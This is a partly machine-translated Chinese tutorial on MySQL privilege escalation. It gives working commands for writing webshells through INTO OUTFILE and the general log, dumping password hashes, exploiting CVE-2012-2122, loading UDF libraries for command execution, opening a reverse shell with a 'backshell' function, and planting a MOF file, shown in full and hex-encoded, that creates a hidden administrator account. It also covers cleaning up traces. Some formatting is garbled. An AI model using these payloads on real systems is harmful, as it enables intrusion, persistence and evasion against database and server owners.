MySQL 提权方法整理

1 Initial Access

1.1 数据库权限

The methods to obtain database operation permissions are nothing more than the following:

3306 Weak password explosion

-sql-shell pattern for sqlmap

Get plaintext password information in the database configuration file of the website

MySQL 1day vulnerability acquisition permission

1.2 webshell 权限

premise

The website is known and the path has write permissions

High permission database user

secure_file_priv unlimited

1

2

3

4

5

6

mysql show global variables like '%secure_file_priv%';

+----------------------+

| Variable_name | Value |

+----------------------+

| secure_file_priv | |

+----------------------+

Before MySQL 5.5, secure_file_priv was empty by default. In this case, files can be written to any absolute path.

After MySQL 5.5, secure_file_priv is NULL by default. In this case, files cannot be written.

The specific principles have been described in detail in the article "SQL Injection Related" and will not be described here.

1.2.1 into outfile 写文件

1

select '?php phpinfo();' into outfile '/var/www/html/info.php';

Under sqlmap, you can perform the following operations:

1

sqlmap -u 'http://x.x.x.x/?id=x' --file-write='/path/to/shell.php' --file-dest='/var/www/html/test/shell.php'

Generally speaking, the permission allocation under Linux system is relatively strict. Under normal circumstances, MySQL users cannot write files directly to the root directory of the site. In this case, the success rate will be very high in Windows environment.

1.2.2 terminated by 写文件

1

?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' lines terminated by '?php phpinfo() ?';

1.2.3 general log 写文件

MySQL version 5.0 or above will create log files. You can modify the global variables of the log to getshell

information

general_log is turned off by default. Turning on it can record every command entered by the user and save it in the corresponding log file.

1

2

3

4

5

6

7

mysql SHOW VARIABLES LIKE 'general%';

+------------------+---------------------------------+

| Variable_name | Value |

+------------------+---------------------------------+

| general_log | OFF |

| general_log_file | /var/lib/mysql/c1595d3a029a.log |

+------------------+---------------------------------+

By changing the general_log storage location to a web directory. At the same time, if you write content into the log file, you can successfully getshell.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

# Change log file location

set global general_log='ON';

set global general_log_file='/var/www/html/info.php';

# View the current configuration

mysql SHOW VARIABLES LIKE 'general%';

+------------------+-----------------------------+

| Variable_name | Value |

+------------------+-----------------------------+

| general_log | ON |

| general_log_file | /var/www/html/shell.php |

+------------------+-----------------------------+

# Write payload in the past log

select '?php phpinfo();';

warn

Although a file can be written, the permissions of the file are created by MySQL:

1

-rw-rw---- 1 mysql mysql 293 Feb 19 10:29 shell.php

When accessing this php file, the HTTP 500 status code will appear. The conclusion is that this situation in Linux system will basically not succeed, and the success rate will be higher only on Windows systems.

1.3 Hash 破解

Assuming that SQL injection DBA permission exists, if the target 3306 port is also accessible, you can try to read MySQL's hash to decrypt:

1

2

3

4

5

# MySQL=Version 5.6

mysql select host, user, password from mysql.user;

# MySQL=Version 5.7

mysql select host,user,authentication_string from mysql.user;

It can then be decrypted through the online interface website.

1.4 MySQL 1Day 漏洞

1.4.1 yaSSL 缓冲区溢出

The corresponding modules have been integrated in MSF:

1

2

msf6 use exploit/windows/mysql/mysql_yassl_hello

msf6 use exploit/linux/mysql/mysql_yassl_hello

1.4.2 CVE-2012-2122

Knowing that the user name has entered the wrong password multiple times, there is a chance that you can log in to the database successfully, and you can log in to the database 1,000 times in a loop:

1

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 127.0.0.1 -P3306 ; done

There are corresponding utilization modules in MSF:

1

msf6 use auxiliary/scanner/mysql/mysql_authbypass_hashdump

2 UDF 提权

User Defined Function - Custom function, an extension of database functions. Users can implement functions that cannot be easily implemented in MySQL through custom functions. The new functions they add can be called in SQL statements, just like calling the native function version() and other conveniently.

2.1 手动实现

2.1.1 动态链接库

If it is the version of MySQL=5.1, the UDF dynamic link library file must be placed in the folder under the lib\plugin folder in the MySQL installation directory to create a custom function.

Dynamic link files in sqlmap:

/path/to/sqlmap/data/udf/mysql

These dynamic link libraries are included in sqlmap. In order to prevent being killed by mistake, they have been encoded and cannot be used directly. However, you can use cloak.py, the decoding tool that comes with sqlmap, to decode and use it. For details, refer to the article "SQL Injection-related" for usage.

Dynamic link library files in msf:

/path/to/msf/embedded/framework/data/exploits/mysql

2.1.2 插件目录存放位置

is implemented through the following SQL statement:

1

2

3

4

5

6

mysql show variables like '%plugin%';

+---------------+------------------------------+

| Variable_name | Value |

+---------------+------------------------------+

| plugin_dir | /usr/local/mysql/lib/plugin/|

+---------------+------------------------------+

Skill

In Windows, you can use NTFS streams to create this folder:

select 233 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin:$index_allocation';

Skill

How to find the installation directory of mysql:

1

2

3

4

5

6

mysql select @@basedir;

+------------------------+

| @@basedir |

+------------------------+

| /usr/local/mysql |

+------------------------+

2.1.3 写入动态链接库

SQL injection and is highly authorized. The plugin directory is writable and requires unlimited secure_file_priv. The MySQL plug-in directory can be written by MySQL users. At this time, you can directly use sqlmap to upload the dynamic link library. Because GET has字节长度限制, POST injection often allows this kind of attack to be performed.

1

sqlmap -u 'http://localhost/' --data='id=1' --file-write='/path/to/lib_mysqludf_sys_64.so' --file-dest='/usr/lib/mysql/plugin/udf.so'

If there is no injection, we can operate native SQL statements. In this case, when secure_file_priv is unlimited, we can manually write files to the plugin directory:

1

2

# Direct SELECT query hexadecimal write

SELECT0x7f454c4602. INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

How to get the hexadecimal system here? You can use the hex function that comes with MySQL to encode:

1

2

3

4

5

# Directly pass the path encoding

SELECT hex(load_file('/lib_mysqludf_sys_64.so'));

# You can also encode the path hex

SELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f));

2.1.4 命令执行

1

2

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

select sys_eval('whoami');

2.1.5 清理痕迹

Delete custom functions:

1

drop function sys_eval;

2.2 自动化实现

Module in msf:

1

msf6 set payload linux/x86/shell/bind_tcp

2.3 UDF Shell

Assuming that the target MySQL cannot directly connect to MySQL or MySQL does not allow external connections, some web scripts are more convenient and easy to use.

2.3.1 UDF.PHP

UDF command execution Malaysia: https://github.com/echohun/tools/blob/master/Master/Malays/udf.php

2.3.2 Navicat MySQL

Target MySQL does not allow external connections. At this time, you can use the tunnel tunnel script that comes with Navicat to upload to the target website:

Then set the HTTP channel when connecting:

After the connection is successful, the above manual UDF privilege raising steps can be performed.

2.4 反弹端口提权

In fact, this is another way to use UDF to escalate power, but the dynamic link library here has been customized, with more functions and more practical:

1

2

3

4

5

6

7

8

9

10

cmdshell # Execute cmd

downloader # downloader, download the specified file online and save it to the specified directory

open3389 # Universal open 3389 terminal service, can specify ports (no need to restart if the port is not changed)

backshell # rebound shell

ProcessView # Enumerate system processes

KillProcess # Terminate the specified process

regress # read the registry

regwrite # Write a registry

shut # shut down, log out, restart

about # Description and Help Function

Address: https://github.com/Geekby/langouster_udf

First, enable NC listening on the attack machine, then import the dll dynamic link library on the target machine, and then create a custom function:

1

CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';

Direct rebound shell:

1

select backshell('IP', 4444);

3 MOF 提权

The MOF power elevation is a historic vulnerability that can be successful basically in the Windows Server 2003 environment.

The principle of

3.1 原理

The principle of escalation of rights is that the mof file in the C:/Windows/system32/wbem/mof/directory is executed by the system every once in a while (about a few seconds). Because some of the MOF is a VBS script, you can use this VBS script to call CMD to execute system commands. If MySQL has permission to operate the mof directory, you can execute any command.

3.2 手动复现

3.2.1 上传 mof 文件

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

#pragma namespace('\\\\\.\\root\\subscription')

instance of __EventFilter as $EventFilter

{

EventNamespace='Root\\Cimv2';

Name='filtP2';

Query='Select * From __InstanceModificationEvent '

'Where TargetInstance Isa \'Win32_LocalTime\' '

'And TargetInstance.Second=5';

QueryLanguage='WQL';

};

instance of ActiveScriptEventConsumer as $Consumer

{

Name='consPCSV2';

ScriptingEngine='JScript';

ScriptText=

'var WSH=new ActiveXObject(\'WScript.Shell\')\nWSH.run(\'net.exe user hacker P@ssw0rd /add\')\nWSH.run(\'net.exe localgroup administrators hacker /add\')';

};

instance of __FilterToConsumerBinding

{

Consumer=$Consumer;

Filter=$EventFilter;

};

Using the feature of MySQL to write files, import this MOF file into the C:/Windows/system32/wbem/mof/directory, and the above encoding method is still used:

1

select0x23707261676D61206E616D65737061636528225C5C5C2E5C5C726F6F745C5C737562736372697074696F6E2229200A0A696E7374616E6365206F66205F5F4576656E7446696C74657220617320244576656E7446696C746572200A7B 200A202020204576656E744E616D657370616365203D2022526F6F745C5C43696D7632223B200A202020202020204E616D6520203D202266696C745032223B200A20202020205175657279203D202253656C656374202A2046726F6D205F5F496E73 74616E63654D6F64696669636174696F6E4576656E742022200A20202020202020202020202022576865726520546172676574496E7374616E636520497361205C2257696E33325F4C6F63616C54696D655C222022200A20202020202020 20202020202022416E6420546172676574496E7374616E63652E5365636F6E64203D2035223B200A20202051756572794C616E6775616765203D202257514C223B200A7D3B200A0A696E7374616E6365206F662041637469766553637269 70744576656E74436F6E73756D65722061732024436F6E73756D6572200A7B200A202020202020204E616D65203D2022636F6E735043535632223B200A20202020536372697074696E67456E67696E65203D20224A536372697074223B200A2020 202053637269707454657874203D200A2276617220575348203D206E657720416374697665584F626A656374285C22575363726970742E5368656C6C5C22295C6E5753482E72756E285C226E65742E6578652075736572206861636B6572 205040737377307264202F6164645C22295C6E5753482E72756E285C226E65742E657865206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F6164645C2229223B200A7D3B200A0A696E7374616E6365 206F66205F5F46696C746572546F436F6E73756D657242696E64696E67200A7B200A20202020436F6E73756D65722020203D2024436F6E73756D65723B200A2020202046696C746572203D20244576656E7446696C7465723B200A7D3B0A into dumpfile 'C:/windows/system32/wbem/mof/test.mof';

3.2.2 痕迹清理

Because every few minutes